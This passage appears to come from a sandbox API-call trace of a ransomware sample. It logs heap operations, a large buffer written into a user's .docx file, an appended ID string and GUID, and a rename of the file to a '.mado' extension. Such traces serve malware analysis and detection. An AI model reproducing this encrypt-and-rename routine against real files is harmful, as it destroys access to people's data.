out: hHeap=0x2c0000) returned 1 [0204.225] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0204.225] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0204.225] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0204.225] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0204.225] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0204.225] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e50) returned 0x3b74b68 [0204.225] SetFilePointer (in: hFile=0x63c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0204.225] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0204.225] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x3310808 [0204.225] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0204.225] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x32eb20 [0204.225] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e51f8 [0204.225] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b6e750 [0204.226] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe0e8 [0204.226] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b6e798 [0204.226] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe100 [0204.226] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe130 [0204.226] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe178 [0204.226] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe148 [0204.226] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x32f7e58 [0204.226] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x3b6eb80 [0204.226] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b6eb80, Size=0x218) returned 0x3b7c6a8 [0204.226] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b769c0 [0204.226] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe130 | out: hHeap=0x2c0000) returned 1 [0204.226] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe148 | out: hHeap=0x2c0000) returned 1 [0204.226] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe178 | out: hHeap=0x2c0000) returned 1 [0204.226] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0204.226] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b769c0 | out: hHeap=0x2c0000) returned 1 [0204.226] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe178 [0204.226] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771a8 [0204.226] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x32fe148 [0204.226] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36e0 [0204.226] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x32fe130 [0204.226] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0204.226] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x3b6bb80 [0204.226] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0204.226] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5198 [0204.226] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3720 [0204.226] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x3b6bc98 [0204.226] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36c0 [0204.226] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0204.226] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bb80 | out: hHeap=0x2c0000) returned 1 [0204.227] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe148 | out: hHeap=0x2c0000) returned 1 [0204.227] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0204.227] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe130 | out: hHeap=0x2c0000) returned 1 [0204.227] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0204.227] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0204.227] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe178 | out: hHeap=0x2c0000) returned 1 [0204.227] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0204.227] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e51f8 | out: hHeap=0x2c0000) returned 1 [0204.227] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0204.227] GetCurrentThreadId () returned 0x600 [0204.227] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b68078 [0204.227] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x3b71120 [0204.227] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x32c0218 [0204.227] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0204.227] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x336fe98 [0204.227] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0204.227] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277188 [0204.227] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b68180 [0204.227] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.227] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.227] GetCurrentThreadId () returned 0x600 [0204.227] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.227] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.227] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x32b69d8 [0204.227] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.227] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.227] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.227] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.227] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0204.227] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b68288 [0204.228] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0204.228] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x32c3578 [0204.228] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0204.228] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b68390 [0204.228] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.228] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe178 [0204.228] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.228] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.228] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9e0 [0204.228] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9f0 [0204.228] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b780 [0204.228] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b790 [0204.228] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7a0 [0204.228] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7b0 [0204.228] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe130 [0204.228] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0204.228] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9e0 [0204.228] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.228] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.228] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7c0 [0204.228] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7d0 [0204.228] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7e0 [0204.228] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe148 [0204.228] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7d0 | out: hHeap=0x2c0000) returned 1 [0204.228] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36e0 [0204.228] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7c0 | out: hHeap=0x2c0000) returned 1 [0204.228] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe118 [0204.228] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7e0 | out: hHeap=0x2c0000) returned 1 [0204.228] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe190 [0204.228] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.229] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771c8 [0204.229] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7a0 | out: hHeap=0x2c0000) returned 1 [0204.229] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe160 [0204.229] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.229] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe1a8 [0204.229] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0204.229] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9f0 [0204.229] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0204.229] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36a0 [0204.229] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0204.229] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b37c0 [0204.229] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe130 | out: hHeap=0x2c0000) returned 1 [0204.229] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe130 [0204.229] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0204.229] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x3b7c6a8 [0204.229] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe178 | out: hHeap=0x2c0000) returned 1 [0204.229] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b6bb80 [0204.229] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe1a8 | out: hHeap=0x2c0000) returned 1 [0204.229] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x3b769c0 [0204.229] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b37c0 | out: hHeap=0x2c0000) returned 1 [0204.229] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x3b6bdb0 [0204.229] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b780 | out: hHeap=0x2c0000) returned 1 [0204.229] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b6bec8 [0204.229] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe130 | out: hHeap=0x2c0000) returned 1 [0204.229] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x3b76bd8 [0204.229] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bb80 | out: hHeap=0x2c0000) returned 1 [0204.230] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b68498 [0204.230] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0204.230] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0204.230] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b68288 | out: hHeap=0x2c0000) returned 1 [0204.230] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b68498 | out: hHeap=0x2c0000) returned 1 [0204.230] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36a0 | out: hHeap=0x2c0000) returned 1 [0204.230] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bec8 | out: hHeap=0x2c0000) returned 1 [0204.230] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b769c0 | out: hHeap=0x2c0000) returned 1 [0204.230] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b76bd8 | out: hHeap=0x2c0000) returned 1 [0204.230] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bdb0 | out: hHeap=0x2c0000) returned 1 [0204.230] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b790 | out: hHeap=0x2c0000) returned 1 [0204.230] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe160 | out: hHeap=0x2c0000) returned 1 [0204.230] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7b0 | out: hHeap=0x2c0000) returned 1 [0204.230] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe190 | out: hHeap=0x2c0000) returned 1 [0204.230] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0204.230] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe148 | out: hHeap=0x2c0000) returned 1 [0204.230] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe118 | out: hHeap=0x2c0000) returned 1 [0204.230] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0204.230] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0218 | out: hHeap=0x2c0000) returned 1 [0204.230] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b68180 | out: hHeap=0x2c0000) returned 1 [0204.230] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe100 | out: hHeap=0x2c0000) returned 1 [0204.230] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6e798 | out: hHeap=0x2c0000) returned 1 [0204.230] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0204.230] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b68390 | out: hHeap=0x2c0000) returned 1 [0204.230] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3578 | out: hHeap=0x2c0000) returned 1 [0204.230] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc98 | out: hHeap=0x2c0000) returned 1 [0204.230] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b3720 | out: hHeap=0x2c0000) returned 1 [0204.230] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0204.230] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0204.230] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e5198 | out: hHeap=0x2c0000) returned 1 [0204.231] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32eb20 | out: hHeap=0x2c0000) returned 1 [0204.231] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0204.231] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0204.231] WriteFile (in: hFile=0x63c, lpBuffer=0x3b74b68*, nNumberOfBytesToWrite=0x1e4f, lpNumberOfBytesWritten=0x39cfb14, lpOverlapped=0x0 | out: lpBuffer=0x3b74b68*, lpNumberOfBytesWritten=0x39cfb14*=0x1e4f, lpOverlapped=0x0) returned 1 [0204.231] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0204.231] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x1e54, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.231] WriteFile (in: hFile=0x63c, lpBuffer=0x3b68078*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b68078*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0204.231] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b68078 | out: hHeap=0x2c0000) returned 1 [0204.231] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32ff260 [0204.231] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x3b74b68 [0204.231] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", cchWideChar=-1, lpMultiByteStr=0x3b74b68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", lpUsedDefaultChar=0x0) returned 41 [0204.231] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x3b74f98 [0204.231] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0204.231] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ff260 | out: hHeap=0x2c0000) returned 1 [0204.231] WriteFile (in: hFile=0x63c, lpBuffer=0x3b74f98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b74f98*, lpNumberOfBytesWritten=0x39cfb50*=0x28, lpOverlapped=0x0) returned 1 [0204.231] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74f98 | out: hHeap=0x2c0000) returned 1 [0204.231] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0204.231] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0204.231] CloseHandle (hObject=0x63c) returned 1 [0204.232] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0204.232] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x880) returned 0x3b74b68 [0204.232] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0204.232] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Zj3qy-Hilt P.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\zj3qy-hilt p.docx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Zj3qy-Hilt P.docx.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\zj3qy-hilt p.docx.mado")) returned 1 [0204.233] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0204.233] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0204.233] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.234] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef090 | out: hHeap=0x2c0000) returned 1 [0204.234] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x445df610, ftCreationTime.dwHighDateTime=0x1d5a03f, ftLastAccessTime.dwLowDateTime=0xc4f68370, ftLastAccessTime.dwHighDateTime=0x1d58d69, ftLastWriteTime.dwLowDateTime=0xc4f68370, ftLastWriteTime.dwHighDateTime=0x1d58d69, nFileSizeHigh=0x0, nFileSizeLow=0x1e54, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Zj3qy-Hilt P.docx", cAlternateFileName="ZJ3QY-~1.DOC")) returned 0 [0204.234] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0204.234] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0100 | out: hHeap=0x2c0000) returned 1 [0204.234] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384580 | out: hHeap=0x2c0000) returned 1 [0204.234] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0204.234] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384580 [0204.234] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0204.234] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0204.234] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0204.234] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0204.234] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0204.234] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0204.234] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0204.235] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0204.235] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0204.235] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0204.235] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0204.235] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0204.235] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0204.235] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0204.235] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0204.235] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0204.235] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0204.235] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0204.235] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0204.235] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0204.235] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0204.235] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0204.235] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0204.235] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0204.235] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0204.235] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0204.235] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0204.235] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0204.235] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0204.235] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0204.235] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0204.235] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0204.235] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0204.235] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, 